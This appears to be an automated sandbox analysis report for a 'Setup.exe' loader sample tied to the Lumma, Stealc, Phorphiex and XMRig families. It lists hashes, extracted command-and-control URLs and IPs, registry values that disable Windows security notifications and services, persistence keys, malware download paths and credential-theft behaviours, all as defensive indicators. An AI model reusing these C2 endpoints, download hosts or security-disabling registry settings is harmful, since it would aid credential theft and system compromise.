lumma | dda39f19837168845de33959de34bcfb7ee7f3a29ae55c9fa7f4cb12cb27f453

Analysis

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
28-10-2024 19:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Setup.exe
Size

12KB
MD5

a14e63d27e1ac1df185fa062103aa9aa
SHA1

2b64c35e4eff4a43ab6928979b6093b95f9fd714
SHA256

dda39f19837168845de33959de34bcfb7ee7f3a29ae55c9fa7f4cb12cb27f453
SHA512

10418efcce2970dcdbef1950464c4001753fccb436f4e8ba5f08f0d4d5c9b4a22a48f2803e59421b720393d84cfabd338497c0bc77cdd4548990930b9c350082
SSDEEP

192:brl2reIazGejA7HhdSbw/z1ULU87glpK/b26J4S1Xu85:b52r+xjALhMWULU870gJJ

Score

10^/10

lumma phorphiex stealc xmrig mainteam credential_access defense_evasion discovery evasion execution loader miner persistence spyware stealer trojan worm

Malware Config

Extracted

Family

stealc

Botnet

mainteam

http://95.182.96.50

Attributes

url_path
/2aced82320799c96.php

Extracted

Family

phorphiex

http://185.215.113.84

Extracted

Family

lumma

https://tryyudjasudqo.shop/api

https://eemmbryequo.shop/api

https://reggwardssdqw.shop/api

https://relaxatinownio.shop/api

https://tesecuuweqo.shop/api

https://tendencctywop.shop/api

https://licenseodqwmqn.shop/api

https://keennylrwmqlw.shop/api

https://optinewlip.shop/api

https://deficticoepwqm.shop/api

Signatures

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4"	sysppvrdnvs.exe

Phorphiex family
phorphiex

Phorphiex payload 1 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023c82-15.dat	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

description	pid	Process	procid_target
PID 4748 created 3380	4748	1561811205.exe	56
PID 4748 created 3380	4748	1561811205.exe	56
PID 4148 created 3380	4148	winupsecvmgr.exe	56
PID 4148 created 3380	4148	winupsecvmgr.exe	56
PID 4148 created 3380	4148	winupsecvmgr.exe	56

Windows security bypass 2 TTPs 6 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysppvrdnvs.exe

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 7 IoCs

miner

resource	yara_rule
behavioral2/memory/4148-347-0x00007FF6282F0000-0x00007FF628887000-memory.dmp	xmrig
behavioral2/memory/4604-373-0x00007FF6447C0000-0x00007FF644FAF000-memory.dmp	xmrig
behavioral2/memory/4604-376-0x00007FF6447C0000-0x00007FF644FAF000-memory.dmp	xmrig
behavioral2/memory/4604-393-0x00007FF6447C0000-0x00007FF644FAF000-memory.dmp	xmrig
behavioral2/memory/4604-395-0x00007FF6447C0000-0x00007FF644FAF000-memory.dmp	xmrig
behavioral2/memory/4604-402-0x00007FF6447C0000-0x00007FF644FAF000-memory.dmp	xmrig
behavioral2/memory/4604-405-0x00007FF6447C0000-0x00007FF644FAF000-memory.dmp	xmrig

Blocklisted process makes network request 1 IoCs

flow	pid	Process
127	4240	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
4240	powershell.exe
3376	powershell.exe
1232	powershell.exe
3472	powershell.exe
2688	powershell.exe
2164	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	sysppvrdnvs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Edge.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	2871131115.exe

Executes dropped EXE 23 IoCs

pid	Process
2052	http185.215.113.66pei.exe.exe
1992	httptwizt.netnewtpp.exe.exe
2108	sysppvrdnvs.exe
4608	http31.41.244.11filesEDge.exe.exe
2620	Edge.exe
3500	3165111428.exe
1092	httpsdewatabalirental.com2.exe.exe
4648	2871131115.exe
1776	3241622431.exe
3256	httpsdewatabalirental.com3.exe.exe
1504	httpsdewatabalirental.com1.exe.exe
1484	httpsdewatabalirental.com4.exe.exe
3044	398117829.exe
4728	50729193.exe
4748	1561811205.exe
3892	httpbitbucket.orgjamesom1942wiskeydownloadsSet-up.exe.exe
4148	winupsecvmgr.exe
1052	httpsbitbucket.orgsolgoodmanzixenbergdownloadsBybit.exe.exe
3976	httpbitbucket.orgchermander20sonicwawedownloadsRmMai.exe.exe
2256	httpbitbucket.orgchermander20sonicwawedownloadsbybit.exe.exe
3500	httpbitbucket.orgkcatelinjamesondownloadsGoogle_Chrome.exe.exe
4776	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
5000	Updater.exe

Loads dropped DLL 2 IoCs

pid	Process
1092	httpsdewatabalirental.com2.exe.exe
1092	httpsdewatabalirental.com2.exe.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Windows security modification 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysppvrdnvs.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysppvrdnvs.exe"	httptwizt.netnewtpp.exe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{AB1F3E47-AEF1-400E-A108-233A046C3A34} = "C:\\Users\\Admin\\AppData\\Roaming\\Edge\\Edge.exe {5E0DB032-E9D6-4C1D-A145-C083BA9C5AAA}"	Edge.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
56	bitbucket.org
57	bitbucket.org
223	raw.githubusercontent.com
224	raw.githubusercontent.com
234	pastebin.com
235	pastebin.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	Updater.exe

Suspicious use of SetThreadContext 9 IoCs

description	pid	Process	procid_target
PID 3256 set thread context of 3252	3256	httpsdewatabalirental.com3.exe.exe	141
PID 4148 set thread context of 2188	4148	winupsecvmgr.exe	164
PID 4148 set thread context of 4604	4148	winupsecvmgr.exe	165
PID 3892 set thread context of 2136	3892	httpbitbucket.orgjamesom1942wiskeydownloadsSet-up.exe.exe	163
PID 1052 set thread context of 768	1052	httpsbitbucket.orgsolgoodmanzixenbergdownloadsBybit.exe.exe	169
PID 3976 set thread context of 3252	3976	httpbitbucket.orgchermander20sonicwawedownloadsRmMai.exe.exe	171
PID 2256 set thread context of 644	2256	httpbitbucket.orgchermander20sonicwawedownloadsbybit.exe.exe	182
PID 5000 set thread context of 1788	5000	Updater.exe	228
PID 5000 set thread context of 4688	5000	Updater.exe	229

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\sysppvrdnvs.exe	httptwizt.netnewtpp.exe.exe
File opened for modification	C:\Windows\sysppvrdnvs.exe	httptwizt.netnewtpp.exe.exe

Launches sc.exe 19 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2952	sc.exe
2940	sc.exe
2460	sc.exe
3468	sc.exe
4688	sc.exe
964	sc.exe
1232	sc.exe
3596	sc.exe
2228	sc.exe
2716	sc.exe
4176	sc.exe
4440	sc.exe
2244	sc.exe
2404	sc.exe
1344	sc.exe
5096	sc.exe
2432	sc.exe
1780	sc.exe
4136	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3580	1504	WerFault.exe	132

System Location Discovery: System Language Discovery 1 TTPs 30 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpbitbucket.orgchermander20sonicwawedownloadsbybit.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	http185.215.113.66pei.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpsdewatabalirental.com3.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	398117829.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpbitbucket.orgchermander20sonicwawedownloadsRmMai.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	50729193.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httptwizt.netnewtpp.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3165111428.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpsdewatabalirental.com4.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpbitbucket.orgjamesom1942wiskeydownloadsSet-up.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3241622431.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysppvrdnvs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpsdewatabalirental.com2.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpsdewatabalirental.com1.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpsbitbucket.orgsolgoodmanzixenbergdownloadsBybit.exe.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	httpsdewatabalirental.com2.exe.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	httpsdewatabalirental.com2.exe.exe

Modifies data under HKEY_USERS 50 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe

Suspicious behavior: EnumeratesProcesses 62 IoCs

pid	Process
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
4648	2871131115.exe
1092	httpsdewatabalirental.com2.exe.exe
1092	httpsdewatabalirental.com2.exe.exe
1092	httpsdewatabalirental.com2.exe.exe
1092	httpsdewatabalirental.com2.exe.exe
1092	httpsdewatabalirental.com2.exe.exe
1092	httpsdewatabalirental.com2.exe.exe
1504	httpsdewatabalirental.com1.exe.exe
1504	httpsdewatabalirental.com1.exe.exe
4748	1561811205.exe
4748	1561811205.exe
3376	powershell.exe
3376	powershell.exe
3376	powershell.exe
4748	1561811205.exe
4748	1561811205.exe
4240	powershell.exe
4240	powershell.exe
4240	powershell.exe
4148	winupsecvmgr.exe
4148	winupsecvmgr.exe
1232	powershell.exe
1232	powershell.exe
1232	powershell.exe
4148	winupsecvmgr.exe
4148	winupsecvmgr.exe
4148	winupsecvmgr.exe
4148	winupsecvmgr.exe
4776	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
2688	powershell.exe
2688	powershell.exe
4776	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
4776	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
4776	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
4776	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
4776	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
4776	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
4776	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
4776	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
4776	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
4776	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
5000	Updater.exe
2164	powershell.exe
2164	powershell.exe
2164	powershell.exe
5000	Updater.exe
5000	Updater.exe
5000	Updater.exe
5000	Updater.exe
5000	Updater.exe
5000	Updater.exe
5000	Updater.exe
5000	Updater.exe
4688	svchost.exe
4688	svchost.exe
4688	svchost.exe
4688	svchost.exe
4688	svchost.exe
4688	svchost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3136	Setup.exe
Token: SeDebugPrivilege	3472	powershell.exe
Token: SeDebugPrivilege	4648	2871131115.exe
Token: SeDebugPrivilege	3376	powershell.exe
Token: SeIncreaseQuotaPrivilege	3376	powershell.exe
Token: SeSecurityPrivilege	3376	powershell.exe
Token: SeTakeOwnershipPrivilege	3376	powershell.exe
Token: SeLoadDriverPrivilege	3376	powershell.exe
Token: SeSystemProfilePrivilege	3376	powershell.exe
Token: SeSystemtimePrivilege	3376	powershell.exe
Token: SeProfSingleProcessPrivilege	3376	powershell.exe
Token: SeIncBasePriorityPrivilege	3376	powershell.exe
Token: SeCreatePagefilePrivilege	3376	powershell.exe
Token: SeBackupPrivilege	3376	powershell.exe
Token: SeRestorePrivilege	3376	powershell.exe
Token: SeShutdownPrivilege	3376	powershell.exe
Token: SeDebugPrivilege	3376	powershell.exe
Token: SeSystemEnvironmentPrivilege	3376	powershell.exe
Token: SeRemoteShutdownPrivilege	3376	powershell.exe
Token: SeUndockPrivilege	3376	powershell.exe
Token: SeManageVolumePrivilege	3376	powershell.exe
Token: 33	3376	powershell.exe
Token: 34	3376	powershell.exe
Token: 35	3376	powershell.exe
Token: 36	3376	powershell.exe
Token: SeIncreaseQuotaPrivilege	3376	powershell.exe
Token: SeSecurityPrivilege	3376	powershell.exe
Token: SeTakeOwnershipPrivilege	3376	powershell.exe
Token: SeLoadDriverPrivilege	3376	powershell.exe
Token: SeSystemProfilePrivilege	3376	powershell.exe
Token: SeSystemtimePrivilege	3376	powershell.exe
Token: SeProfSingleProcessPrivilege	3376	powershell.exe
Token: SeIncBasePriorityPrivilege	3376	powershell.exe
Token: SeCreatePagefilePrivilege	3376	powershell.exe
Token: SeBackupPrivilege	3376	powershell.exe
Token: SeRestorePrivilege	3376	powershell.exe
Token: SeShutdownPrivilege	3376	powershell.exe
Token: SeDebugPrivilege	3376	powershell.exe
Token: SeSystemEnvironmentPrivilege	3376	powershell.exe
Token: SeRemoteShutdownPrivilege	3376	powershell.exe
Token: SeUndockPrivilege	3376	powershell.exe
Token: SeManageVolumePrivilege	3376	powershell.exe
Token: 33	3376	powershell.exe
Token: 34	3376	powershell.exe
Token: 35	3376	powershell.exe
Token: 36	3376	powershell.exe
Token: SeIncreaseQuotaPrivilege	3376	powershell.exe
Token: SeSecurityPrivilege	3376	powershell.exe
Token: SeTakeOwnershipPrivilege	3376	powershell.exe
Token: SeLoadDriverPrivilege	3376	powershell.exe
Token: SeSystemProfilePrivilege	3376	powershell.exe
Token: SeSystemtimePrivilege	3376	powershell.exe
Token: SeProfSingleProcessPrivilege	3376	powershell.exe
Token: SeIncBasePriorityPrivilege	3376	powershell.exe
Token: SeCreatePagefilePrivilege	3376	powershell.exe
Token: SeBackupPrivilege	3376	powershell.exe
Token: SeRestorePrivilege	3376	powershell.exe
Token: SeShutdownPrivilege	3376	powershell.exe
Token: SeDebugPrivilege	3376	powershell.exe
Token: SeSystemEnvironmentPrivilege	3376	powershell.exe
Token: SeRemoteShutdownPrivilege	3376	powershell.exe
Token: SeUndockPrivilege	3376	powershell.exe
Token: SeManageVolumePrivilege	3376	powershell.exe
Token: 33	3376	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3136 wrote to memory of 2052	3136	Setup.exe	100
PID 3136 wrote to memory of 2052	3136	Setup.exe	100
PID 3136 wrote to memory of 2052	3136	Setup.exe	100
PID 3136 wrote to memory of 1992	3136	Setup.exe	101
PID 3136 wrote to memory of 1992	3136	Setup.exe	101
PID 3136 wrote to memory of 1992	3136	Setup.exe	101
PID 1992 wrote to memory of 2108	1992	httptwizt.netnewtpp.exe.exe	102
PID 1992 wrote to memory of 2108	1992	httptwizt.netnewtpp.exe.exe	102
PID 1992 wrote to memory of 2108	1992	httptwizt.netnewtpp.exe.exe	102
PID 3136 wrote to memory of 4608	3136	Setup.exe	103
PID 3136 wrote to memory of 4608	3136	Setup.exe	103
PID 4608 wrote to memory of 2620	4608	http31.41.244.11filesEDge.exe.exe	105
PID 4608 wrote to memory of 2620	4608	http31.41.244.11filesEDge.exe.exe	105
PID 2052 wrote to memory of 3500	2052	http185.215.113.66pei.exe.exe	106
PID 2052 wrote to memory of 3500	2052	http185.215.113.66pei.exe.exe	106
PID 2052 wrote to memory of 3500	2052	http185.215.113.66pei.exe.exe	106
PID 2108 wrote to memory of 2800	2108	sysppvrdnvs.exe	107
PID 2108 wrote to memory of 2800	2108	sysppvrdnvs.exe	107
PID 2108 wrote to memory of 2800	2108	sysppvrdnvs.exe	107
PID 2108 wrote to memory of 4796	2108	sysppvrdnvs.exe	109
PID 2108 wrote to memory of 4796	2108	sysppvrdnvs.exe	109
PID 2108 wrote to memory of 4796	2108	sysppvrdnvs.exe	109
PID 2800 wrote to memory of 3472	2800	cmd.exe	111
PID 2800 wrote to memory of 3472	2800	cmd.exe	111
PID 2800 wrote to memory of 3472	2800	cmd.exe	111
PID 4796 wrote to memory of 4440	4796	cmd.exe	112
PID 4796 wrote to memory of 4440	4796	cmd.exe	112
PID 4796 wrote to memory of 4440	4796	cmd.exe	112
PID 4796 wrote to memory of 3468	4796	cmd.exe	113
PID 4796 wrote to memory of 3468	4796	cmd.exe	113
PID 4796 wrote to memory of 3468	4796	cmd.exe	113
